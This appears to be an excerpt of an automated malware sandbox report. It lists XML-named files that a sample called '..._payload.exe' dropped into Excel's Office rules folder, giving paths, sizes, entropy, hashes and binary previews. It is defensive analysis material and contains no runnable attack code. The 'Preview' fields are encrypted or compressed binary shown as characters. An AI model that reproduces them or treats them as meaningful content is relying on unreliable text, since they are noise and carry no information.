                                                                                                      Entropy (8bit):7.896245282022003
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:phl3PzC/32tEPyiTgOWbBvDy54bWOm6d48e0WcplwD:rl22BifE7yU545jsG
                                                                                                      MD5:2A4B3328E8D72B1138B02654B1FD177C
                                                                                                      SHA1:9600F84B376C433745BE64C8F71C141C494D641F
                                                                                                      SHA-256:EC7369892BD955AEDA879F32C8B2B20FC99D4932078639E498595F2CFB14FF99
                                                                                                      SHA-512:9B6EA915F5A23C9758260E5B9AC143576E3E0725FB78CFBEDC21B0412AF0F85E27E0DF2DFB7ABA5CA29B0925995B8EAF23E193FD3DADE48DC1EE5D019A813612
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.iA\...........1.*{.u...F*@........u..R.l....e......'.~...}..Bi...i.R..O.....*.......?._N.K.....".......&...P\.[..e.....|...xr....d.Z=...n.GzBG`.2.......F...X.g'.dkhI....._..6.r._.......R...ea.4...I.'{....v...1.~....B...3.w3.R.w$.%..]|X/...#..l....0....y.!........8...X.5......S......F.Y.In#.?..G..L...A..hu....~J..x.B.M...Gu..rq2?......i..U...gy...kY..]......Y.... ..)...K!...j.+bw....L...R.....'n.:..KZ)V....;.QF..$.+n....Ag.5./.R. ..,....Z..l.I.h..,A...=....1..A..g2.....l.94W..R^.]0......&P..N..X...Cn>...T7..7"....<.X....kH|5CPS]..J...-...`v..b%x.e.m~H...#....39C.2.s.K..,..N`.+-....;E.h..*-. .xg.....m...qJz.......{..[T|.e..hh....y...i.'M..........G....H.......,\3..2...?.`..j..qa3...|Me y.... .A..]...31.........-..n'..*5.#@...RR.I....].....,.fh..=.T...EE..-..$.,x.C`E..y.E.Ny0.r.o......,E.j...$..t.a..7...>..y.....k...f..=..r..E...4...w0..5.X`....iu7.G.PufE.7...YY...S..$c..o..W..^...t..*......iX.x.{..][2....y...:...mFQ#..'o.~zC......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v8.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1506
                                                                                                      Entropy (8bit):7.8841965553396385
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:qBtvrO3BY2noOM1MD6NGfnMSZ5Lk9Y2MCDXrQ0Y634hQesa9zr0UDSWCE0v6bD:oO3BbXL6NGvBcY2fTrQpHhvbunzwD
                                                                                                      MD5:A688C72250B1F8B369BC305420A8469D
                                                                                                      SHA1:0AD1B13D6585D9AAA4E6D31E0EBA336AC15DCA74
                                                                                                      SHA-256:2D13F5C36DA86A7171CD7CE40337C116C424A651EAF4AD54853ED145D8E4A478
                                                                                                      SHA-512:FC4BAD96D2657E381ACEFB9A7BC0EC74538035108501C2581511F90E9CD8F1AAA50F27392E962AEB96CD00F8FD2A9A3D1FEA24F8D4A090C140CB2F49DC640709
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.-..q.....KW.c.I.A{.J...l........e7..........x.l....&....f3.VV....=).?.u..T..W...}..b..7i?R+...N..J}.A.X..z....si.......c.....cg.Z.....r..XA/...<..T.m..T.~..7..Y.u.L...d...).i.I).v{......7@l.{..F.J...g.p.m..."......8....P.9.U.z.....*.t.~.nm...6.......n....(.q~#.....kOR.3...&......$....}X.#.TT\..1....i.Q...g.........(.E(XK5X._.....L.0....c../VJ.G.t..e.,C,.~..z(o.g...w>Q...rk.......15.....}.0Ow}.Yg.d...b..E....e....&^...."./..k.r.MA....%a.?u.=?....x5...[....O.......7l.3tzI....V......e...;"....[C.\.J9R.n..w..=..k...DG....$r..{..F-`.s.....K.K..c..zi.........O&..v...\L.c.9>p....D......B...Q..}......#....t..V...\;z.G...L...bsf]..6{.q..d.....voT..u0.Q..z.....e...."...B.....%.l.w}~.P....k'...c..Il%...UX......u'...DN.>Q...a.$.p..J...[.............=..TP...hlTd#.....+..=[.q..v.;..W.Ik.\...^@L./.....Y...h.w..2d+.OB.pG......!?........_~.S'Ir>..&&w[. .....P.(x.Ns..&..9/D.....*./...+7.B@.o.t.%..RG.....P&.1...$.....k..+H620/Q.%......._...Q...i..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120127v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1511
                                                                                                      Entropy (8bit):7.891737886223371
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:XGU1twDW7NmVIEevLkV/wKxpKdGyz11GbAQeJvQuiz9t4TXuNMt2hUvOer/Gbxhc:Xt1tw67u6CGHzG6vQui5tpMtGu6VhikK
                                                                                                      MD5:CA8400BC05910063D34FD308940886DF
                                                                                                      SHA1:AA2AD1098829072BD68D18526AF60A9E99EC2B2B
                                                                                                      SHA-256:E92D755AE77B724810D8D29D0CDD5C0A6DE0C7BCDE031D0066895588D138515E
                                                                                                      SHA-512:31DBC7F53EFBD140BA2A7E4AED2A768D7EE85882010855AE510BBAB7DCF2EFE524D95A8853242AF85C89A2DE479C3F1DA97CC6724C2A811AE31BD35CEBF62D07
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....!.8n.a[....:...@.5...>.wtkMS.........x...j.k=..G.7..@...}.K6k......H.u..4N..uP.-.s....y.8p.<..zY.5...<x....8@.9.%L...y".j....>....P.MM...B....!a..........;..>..S....,..{Ue.1..CRA........)..dR...3.V.~...:./H....CO...C*.......bk...U4....R..O....MI&.Q....K.e.|...H.?.2'......* >Szlv.. .k{..../M...w..]..V.u.{........H.J.. Z.$...*..\.~..Adm..O...m.].h.W...9.....B.|i"3.\r.TM?..\.V ..8..V....@....S.;{..y3{.d._..].[.2.F{.x.jOL.6.H..`.......]..0...nE?.-q.*........V..^m.q,.F.Fp.[...].....^..9.....X..H..y.$...B......I.S.p..k.f.?w..zN..+..K........{.../...S.*.f...d(...yEu.k9w.3............a}....$.!..w...F.:...4..:/..&C.0.`R...X..$....0.1.O..P}..c53.Cd_....^O.n{*`.....hg\.+...Za......<..A.;i.......0.'B..e@)e<....Q...t.HFO8......z....}|.+..>.`8.X..`"......_+.....1)....u..-$..{..."..F....(.%D.....l.~E.P.u.j.-..+40Yt..i=.@..y...#...?*ye.Y..1...W|...)P..m.........A........!.f..Q..n.`4....ka...;A...p..BA.[..\.q.H...!......R.G....U..g._go..;(2..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120128v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):991
                                                                                                      Entropy (8bit):7.811604215096669
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:C5xOLh9TiOk9KsTo4Wj5xjEZT7f8nDH2yLTwB2fO3JiZlbKYwHZwv6bD:UOVgJ9Xo4Wlx4F70nzzTwB2fCQaXuwD
                                                                                                      MD5:2385B947767E5145754E223FD4E36E87
                                                                                                      SHA1:B06963787DF075DD4B8ED5015500741AE04D4CD8
                                                                                                      SHA-256:8B1FDC52C068A809AE3D1BB9BE32F96EB4C64DC20235EFDB19672B0003134F93
                                                                                                      SHA-512:5E98848FDCEF59270134505298601A16FAEDC82C8ACF759163829700F516C863A7A9EEF31199869A95961151A0001B8FA27463A58BD21B93CDDAD3B28766EE9B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml. *..l........;...G....h-...S.k.;.GP.Q!.s..O.7.0.m......2.{.(....h....q..fkg3...mAQ....#BM...eRpH.....#.. ?.><g(}9...nD.rfv..Q.e_.I.n,.....Y.F..6lL.&_...J .Vz..jV....."i.^}x..dh.9..x.. Z......\U...x.....=I..r#:k>.D..I.ma...../{.pQ5...=U.$..E@z...~..Q...;.tI...q...K.^.......+..x..k?9.V..A.....`......}....>.Y..P.C..o.x...p8..e.,".-&..9...9.6.h..U.B...U.J.i....Up.TXG.!.....d...Bl.......v..>.........g.+7X... .G.4vJ..e.D..ff./D.Y....M...Y..)...T.A..,os....@.1.H.....=Ih.Mk....L....Ql._0.=..2..rcq.".do...r......h.U....5..b......8..8g......;.n..i[y..#z.C.W.l...-..&|..C'..q........gh6/.).6..}..Jz..x8^..X....gYg..d..._i..H+}.mpI..R.....e|...9...[...).+b.V...).0.3T.o..jg<.+l.).".....@[:&......PSZ..!.i.H..`z.H.^...R..M..........0....5(..~@..J^..#. ..t....m2.^..Fw.!.c.\...W../.t....Y....eT.J.#:7......D.)"...m3~,...J..G..\]...Mg.N).0..w....dd5..)...G..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12019v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4150
                                                                                                      Entropy (8bit):7.955707113950849
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:WWLIFnJH+XqP5PswxsmC29/eu//PAk2Y/L421BH0H:eFnMapn+mh/eMPAk3g
                                                                                                      MD5:D36C49A1AF6B3DAA6A0FCE5123571CDB
                                                                                                      SHA1:52D5FD8189BDA3A5E5630C8F2187DDCF4B273594
                                                                                                      SHA-256:CD1D388D6601B148D081D30A49FF270E96AAF491DBB079A883D8ADC0BF57A413
                                                                                                      SHA-512:6F6A0C055A68098EFD61BBD3AE8F30C8D1260C1A66522C8CCFF8B5FB23A3B0DF6193362F847395554B186CEADF2CE343630CD9F12A079512D3A817357B18A9DD
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.s.!.%#c.2K.ed.vj..)....|`?.s......j..f..h..X..)...".C.ly.....(..IZt...V.c..g...l.6@.r.p...........z......Z..x....H.9;.....-.v...U..V;.-..2...\B..T..... .t..s.L..L..7(q..\.i...@....Cg.dXL....7.....E&.....D\......yS....V?.z9ct..z......".p..G...UW...ma...w..f..>~t/...M)..Q.:.n.@]\N..kc...a.......B.VP......|...A..D..N6...32.....h.l..|{-.....x7...g.Mx..l...F| .....7.7..|L.:..d0f...`]..W.K..S.)."....m...WR.......x.`.....^...e.@.Lp.h...F...1.....q.~......_.B.o....EK..4...uw\.eT..6.q..X.ER...i....69........*.@9f..b._V_r1/.GubA..c...%...=.J..H...:.9...]..Z........G. ...b...m....f6.L....5..-*8..%O...)Dp......j$........dk..Z..X..4..H.3$~..<....th...g...1.u..N.......i.......u..>.!..z.#U..(..B.ke;.o6o..Xl.X........m.v...d......G.F......I.}..yW36............|&..46...,B....Jw.F..K.G+C.....f.....+..."...(.....~..`.?v=._......R......S1...;t>;.s..R..O....k..:...../.JnY.. .....#...X.....*....q..f.L\/..].G..C..p.Y....].ZP..#Z.5..L...R..N#s....../2.na

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120201v14.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2974
                                                                                                      Entropy (8bit):7.929574684630455
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:W08wffW38D6MRiKGqnEQELY/mJrVHU2OMt7pSXhgNkSqE88xt07LEftjwD:w4fWM2JhoFE8/mJZHlOMeXhtSrxKLEe
                                                                                                      MD5:A65CAAA84458EB707C8E5375A85FD7C9
                                                                                                      SHA1:A3F6CD7CB6F259E7AF6929F258F7427C166BCB84
                                                                                                      SHA-256:7F3B50BA9859CE3A94F1CC04BBB0F350374018D10B543A1AB4ADC826A590863D
                                                                                                      SHA-512:1EFE811F80246B1E4EC275B7F2A8CC4DE19D154AF4D79A3D01F061060B3F13D93F542193F752308E3B36C2BAE22CBFB5F906586CA36BEE3E859D49CF0C65774F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...C.A...#.....C._87......?.!.,....C.X...L.....uB6.bHw.%-.....F.w&<......A|...p.4..._j.D.J-..V..K..4..]......i.*...a(...g6z..:...1.~=G6..NY.7[..r..i..$P!qA.!O........G.......F.8=.jM.....=C...fy..F....Vb..+.k._a..).....<.d....>...d'.......@f`....q!.aza".R.._6..2..T...e\s....r.q....L.&....P('.v.1u..k..c..v...*'$.....F.F..Z.E#...t.....%.->...].o..5.u.q....+.ry....tl.#mP4... ~6P.i;.@..bl....to.|.}MS..(|...L..u...7P.RrE.....N.v:..6[.J...3V...l...0....:^..kN"...3....x.M.D@.H...e..u8.........&.....S..."o|.<...[R&.+..Q....O....D...7.^n.hs.!pm.....WD.U!Eks_K..... k.~?..z.p.x#.l..k[AM.V..t&>.S.h....E.[Q.k.........XL.jAS..M8.1..x.T.E..q........_....`.....$h..r.1.NI+..;z.fe.......W....N....V_.#.`.].z..r...V.Al.TO=S.nO.....*..:..0..~0.M...... .YK.ML`.Jf'%S/..=fo.L!d..]j6..N...z.LS.......P....3U#".L..Od._..... ...+..I...D.j.?.....\.Tz.t...W.>..1..j*..Ib+........w.i".>.=p.l..$y<..i......7..t...@ao.{......l<..L.......B.....I.BSGG..x.|`<...e..D ..P.8Q.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120205v11.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3363
                                                                                                      Entropy (8bit):7.939659582162399
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rjtbat1+gZBUYWyjWhciRpP1qqnmgM3AQwjHpMXkCw9UoQE3LOQTZmQsezZwD:VGD+TLqWuAquMVwFMX+UoQS6msp
                                                                                                      MD5:7A5817AD67013E1C5A26B36A13F38141
                                                                                                      SHA1:CA55DA61A4F8E7A0F3F044F7FBA9BE826844783B
                                                                                                      SHA-256:82526EFC7C9FD785FC0EB5C6A49B902958E716259820D47F5F7249499200E0C9
                                                                                                      SHA-512:9328E30CC705AD8ED001FF01682459442E53C5C5945FF2355DE9AF2E581F54D52AAB9487F951470A4F9CEFD7A62E04282399DC27AA2D82C9F79A11BBFC7C0CD9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.."('pv.h!!.7..RJ{.'k.W.....C.u..j&m(.Z.(.K....{L/..1.!5.9..5b..F..8md..B$v(.g..x.<..........O.q.N..y......ks.D..=...w...XF".5..."_.%-<.i*$J.$.S<_..L]8.2c..z..._..4.A..G.!\..2..V../@.wg.6...[2C.P.B....Z.Y.....C>..,..w W/;"~...t....a......!.L..Q|..|...Q+.we../...._.. ].GSx...(6?4....^F.{<_..0..P....M.\k5.rt.*..A.a....c[....3w7...w...R.......YA.i.VY....'.+zGpz.E!,bSBH.....O....b..e..O.O..d..Vy_...]..f(.,t,6..G#G...0...HO-..%..y'L.4"/#.v..P..Q.'.4RN..Z.......H.z......yfo.nuI...p5...g/+..../~.[.#S'K..}\+.O.N;o![.j.1....J:._s...s........05..d..9..IE_......{..w.".^....L".p.S..,.+.+..(*.w..f.u3$..d.......DF.D..cn..dP............W..F.$n.x.{.@..\..GP..K.g.mn.../..i...H....#aJ...K...b'-.....k.l.....Q...o..i....}..N9..d.O.Vy.#.{3..).o.5bi1.1.I|.s[.7..YAk.)...q.iIX[Gq...P...,... .1..dQ8I..$k..UY..o.h7X7j..........O...k......._....v&l.... ..m.`..n./.*.50...I..}L0L..D..RZ.'.$...;&..{.R.;.Z....l*;..Qn..{.Wt..+X..R.........(B..g..D.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120300v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1295
                                                                                                      Entropy (8bit):7.857450986417292
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zyuIOH3sAB53iMST5tkMfQm6ps9H05dPU6OYsa9ZOu0whQIcSv6bD:eZOH805VS3o/cKd5O4bg2twD
                                                                                                      MD5:C26EB4BD7E653A685BB2346395A56A34
                                                                                                      SHA1:66346CF2ECE4C91A6F0D5419017C8AC7E662EB1B
                                                                                                      SHA-256:F5D57834983CDFF0F30F34F24A721C1E669858ECE705E2E260F7CA1CBD36A02D
                                                                                                      SHA-512:43F996DFF6959172101DC4B422FCC25A1BF808C05C3C4459E3B86CE1BC4B673D39B4A95D93BBAABFF92C3A72E0D9525956133D7821730678E31353D4C81159AF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.q#...-.H...f.{m...(^...n.,....8...m..|4P..~.l.+.i4......}..@.c...#.!-..}.F.8r..rS.X`..O...}./.C.E....;.w..b.......B...o...l.D6.M.+Y...C.......2........+...3?....`5.....b....mj...r..!..{..*..XOV!kI..*...._..^.tpXk.%.(s...8]r;..w..~4.....5t...jI[Fs.S.5...Jz....^3v..|..)...c........f.W%..+.;..&&..&{.<#.@......?...~.eF...)..'...u....>.H...-.k..C..;./k..?..V.X..W.+.P3....j...[>...0..!. .F....N........l....t..d9p...a..{JT...i...b......+....x...]Pf...1j....fo'Z.+9....-.....]....fiu..H$.......G.a..h.....n."m...N<>-d.\h?..(FXQ..w.7..5.%...a.,mA.x9<...p.l]...F..$.....].:J.'..P.....4.........W.p.V.h..y/Al.2.6.......E.j... r......=...r..Q..u3.8x.K......H....Zi...)Z.i.....!.J..<..x.Gok..eQ...2.S..C.i..'...l....J9....Q"...5h...y^4.=.\.6..p<..H.s.<N.c.Sy...~.f.0?.A...B.{.3._D..s..r....U.|g..ui....3.l.....6..D."<7.y...fS...T......wTA..A_...w.v...Fd...O...\..}.\<fM...I.....F...+...T..<O.--.)........1%l...B..:.B...^c..q.L....9...)b[@.8..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120304v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2582
                                                                                                      Entropy (8bit):7.9341236839249625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:/mPHuGcoO+I/8Tdg+P3aZGQIXasC3hrpQiQy8ddASfDY9wD:/eHuGcv++SxwxrUy8d5Dz
                                                                                                      MD5:E571F8473E4175088AFE19800BF8CD50
                                                                                                      SHA1:3F19C22AD4BEC1B0A14CB4D95CD72FF31820A4E2
                                                                                                      SHA-256:F4EFB3F9A2F83E88000620C9D38C39CCA0040A709DCF400884059082EE44818F
                                                                                                      SHA-512:9E4D876D16C580A0735D870761578FB9CF2575BE20239060D4E85F55B55496A108D413AE3389692438CAC9EE3A5BB85B6FE27898751AE5FE9839960B89D50E71
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..X.*.@4BT......"G..0..^%N..z..s..].O.>..;..X~6....tN..9...\...Ls...3:f.Xwp.....NyW.M..=Y5..g..3`..u;2.-..l....=.6..I....[.....$..+({...X.68..bL.....e.0}.NQc~...Xl.......F<\e$......G..Iwn.....4.ZU..I&.O.{efQ....J..u...Z...?~.<7..t../..K..N....,/..%.......N..w.].M.p>..tM..&.`Z5...N......SP.X8..>.$e..yV.-.....r<}F..g..n.l...zY.s...r`v.O8.e...rl.....o<a..~......^;...*V."Ly....V.Y.W...(4..f......K..a.8k@p.T..,..!.u.`L..g.U..x.E....6......3....<..X...0..1JF.:`U.=...zW..S......)..*l.(.~./..}...~>&Q ..G...v_...Y..L....&+.t]....<.D&GAQRY\......d..&=.P0.6..N`\.3.}t.q...8.v`G3...<..D......j...].D.Q...!O...j..I.........}.........?...1..(.T1...oZ.0<...Y;/...:..w.?.....b..`..",A..d..\=&....N...c......<B'2...v.Mx..Ua>....A.L/.....D'y.{....!.7.......<.".w..&a.s3.b.u.....a.z./..+.....KJ..6.It.EB..V...../....`..D{%YK|...&3@.[...K.._#...1...D..m.........k=A.2.2.aa....Z..i..x\...9.i........X.9.....w..=.H..+.D.$Zi..C....F..(.E.=u......SH..l(.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120305v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1787
                                                                                                      Entropy (8bit):7.886337845435376
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:SvEZUW+dagYGKP5e0K5Bn6ezJ6wTpQhJ9qtYCTnwD:TUnUVGKBeJBnqYpQhmng
                                                                                                      MD5:4D1D002C61D133036952EB942409995A
                                                                                                      SHA1:EA51DD59EBE45990AD9CCF842D47143CB09EDE37
                                                                                                      SHA-256:3324D6BD38F17908E35A2081DB179504BEB52E565D835934157C641D5674DBA9
                                                                                                      SHA-512:7BB61AF7DF31554737E81C82D229079781B0FFACCFD675219CAD32C6AFA3C20180BD798DDC468A069AC475A5E376AD46BADE401D53EA3EEB093D2F3FFE778EFB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..o...Q.45R...S..L&../.....ZG.9......0nn.....I.#...CH..x=.......]...#6.e.8u.+...HG.....(L......<|G.D!..Ikf.+_:l.Ucr.1.......1.....,..B.<.TC...].ot.t.F........s...$QQ..%A.._.v.z.*..}JPq...>4...D...*o.*E.G..^.v.M.(%."....k+U......^.NE.<...y.~./.l .......Z..G`..^f...;..h-...J^...............69f&.Q...Pls&Y..Pl4.1.u<...y....1).\?7%.c.,B..~o4X.W-.V...d./\.........?.>..(..............t...v%UT.1S.**>.....|..6.3..*1.....:.......T}y....7u(...^E.*.:.x.=...y...<>..qR........`.{3.......o.../e..f+....Z......J...c.9.8.Q......^.(*..._/G..V./}sp(3.q...m.w...z.)4T......k'.#.....P.o#.......5..2...j.$...S=?=....W-..%.....d...%h.j.a...@..Xz?0....._.%..d$^....w.?$0..%#k..!O..]Zb(..k}'.&(x.4.:.Cs.....j.:*'..|......tL...%.-...Du.;.....E.x.N......m.~.`../..TB&...Y....5..'.~h.tcn>J, .)z.~..e.....<.m....{..*.R.d.,U+7.../...m..@]..$.-R..X.56..5.....+.[.}.n.r..0Zy.#...Sm...n1......C.../.P$.]..U..@.vp0...{......b.B.wx....a.1..~..q.G`..#2x.v..0<...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120307v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1583
                                                                                                      Entropy (8bit):7.861516208268328
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:qz4I8v7NKhnTaWKlLqkne7gLIoGQRyMuL09cnHMrqf4d3slP+3kFWdkQv6bD:d9Km7SgLIoRbu46naqQd3UVwwD
                                                                                                      MD5:68ED25641F76A3B1F659A1A42200D9B8
                                                                                                      SHA1:0FD8D21E9D5259EEF160FC5FBC96F3AD113A6E1E
                                                                                                      SHA-256:34890CB6BB3F1D4DC99FD6223AFEFCE2CA4E5EB132A89F7990ACBF1F007E7DC5
                                                                                                      SHA-512:2F66E7FF660DC32D637C7F11EB73117F6E02D550CC82F7213BD9578A23E2A03F5A6ABFB1915A9472354ADB445B627D50EAF56022745ABDEA0EB140BE25394083
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....4.]+C.z.....qm...*.m.Q.-..um*...{#..."...6.#...i9<....n....|S7".I. .'&d.?[.s...=./%.6F.M.-6.*.|......W.(J.M).f.kG=.....l....r....Q. %..1-..8.B8a.jE/...|w1.a..].`a~/w@.'{O.. ..b.......9_%.$.Z.[f...;.5EK..p5.......d..j...+b...[%f#-V...(<..."EQd`../.B.mc4.'..........&....&........."Bd...=."........V.5'.u...t)f|..t.ln...=....a..k.&#.E}.U.f4g. .....z.B5j...l&J.........:....9.Z.\a[...Q*GU......D#s..A........M,......!.|.g.......|.@.|r..I6..... .t...6Q..hz......--.......^S}/P..b..V.=~.y3.~...e......@..a.5z.#..|.!..c..g........C..-U\`3j..?l..U.Y.....'...X..VW...q..J.n.....@.M\'......S.b=....;[..X..r<d...pCc=..|IM...W.r<..../.8.!.C..08.g.........igx....ae.&k.tq...?.j. .....E.0...U..m0....bx..,.w.....D....._....F.@[.xm.P.:....\...v-.=(.A..g...I~h...m.+..........\.ig;(...KQ...<..7/.n..k.W.1D9..?....BX... W.xR...&%.B;|..p.....O....D>..x.q....$..EZ.H0!.E3t38..q0...]."&.._k.....(D..].o..;#...9.h.....H..L....Y.(gzxNB.....U.f.`H.3[.x.5Q...q.?PF.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12035v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2801
                                                                                                      Entropy (8bit):7.933495287637003
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1D0SUWugj36Y+ZJomktQp1U5oSVwkeks1KzdW9xfriLI46qRFlRAqkay57NwD:1BrZqKmV7Qob6s1KzdW3riLIm/k75i
                                                                                                      MD5:C17A9F6BF020B8B711781C40CBABF9D0
                                                                                                      SHA1:F26D60172737FE2D6043D2056C281898B50C0039
                                                                                                      SHA-256:EBD21C3620DDC72229FFF3F41692932FA5E5521989E70BFBDFCAC40A338B561C
                                                                                                      SHA-512:9F6E3C22BE8834708064109E5B2E358F14BDCC648393258598EB810259268B28F5AC56F7263EE1EC76F7C9C54953E1766C4DBB32B3BCCC46561DC89C3985FFA3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...T...H.x..O.O..S.....5..k..Pu..0f.....[..$^.6....c......sFM...[..F..y.l+..%.....R.@T...:.(..M.@u|u.Hc.'...H.w....@=R....,.....88.5-.....3...5....<......n8.d......X...`y..S.xM.....2g.,..R\.hC...=y.6.K...u..'v.||?i....A...N..L.kL..$.~R...t.X.....Y........fI.y1.]@..l....@..U.!...|.iT...C.V.-d..........a;.'$8G3...".;....L..%K.m..#u>.....U..q"....Y...:."l..K..Y.......(r..)...q;.+.u0od.J....Y.....@I..vW.U.W.j.....Z~....zW.[..6DA..e1.:...8WD....4iP...3.JB!J.q.................&;.y.o|..,Y.q......o...x+...so.....#..B.1F.?r..m._.!..l:.ZJ..]d.Z...y...vS.D_....'...AA....ReC.*MS..%*...{.Q.V=...+..Q....?...o..o'.g.v.I48m..aa.....6...=...'.}*R.].....n.M.)&~.OD....E...n<..........'........1/.){k...c.Q.J.X.?....L.R.;E.L.Oo<..2d....|.....Otuq.~....!O.M...)b...BvM.....v32t.;WH&-..,..n.....e...M..2.f6...t.7+Sk$..9.).H..l>....w.Ctt4O[.ar.`..nz_.+..m'.....(*m..o.$...C$....j.#4.j.;..'7LD.lG.......R.>..H.l....c...X...3..*...#l.]{-.,......9S.L.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120402v21.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4121
                                                                                                      Entropy (8bit):7.955446920781629
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:jDAjdPakVgerF8BYWnmz7AlaEw7SaUfBZ+5IeuyaTffxL4sv:judPakVpOBln0g2Enfp3v
                                                                                                      MD5:C57D9D29C5F825263A2F8FB3C414BD99
                                                                                                      SHA1:BA3144EA6A1AFB07C48869E54C6A4007223E6E01
                                                                                                      SHA-256:665A7F98A4100F02B2329D57F04260A7C77789EE8E1C4F1B23A7BBC480549632
                                                                                                      SHA-512:F592F89353A8AABAE51E44E9E0E82A6A3047FA6F85EDE5A6D2677CCE1E183A825D00588B6DB03C9EA4AAE32DAA7DD970662A8AB45853C58F3A0E621DBB37D781
                                                                                                      Malicious:false
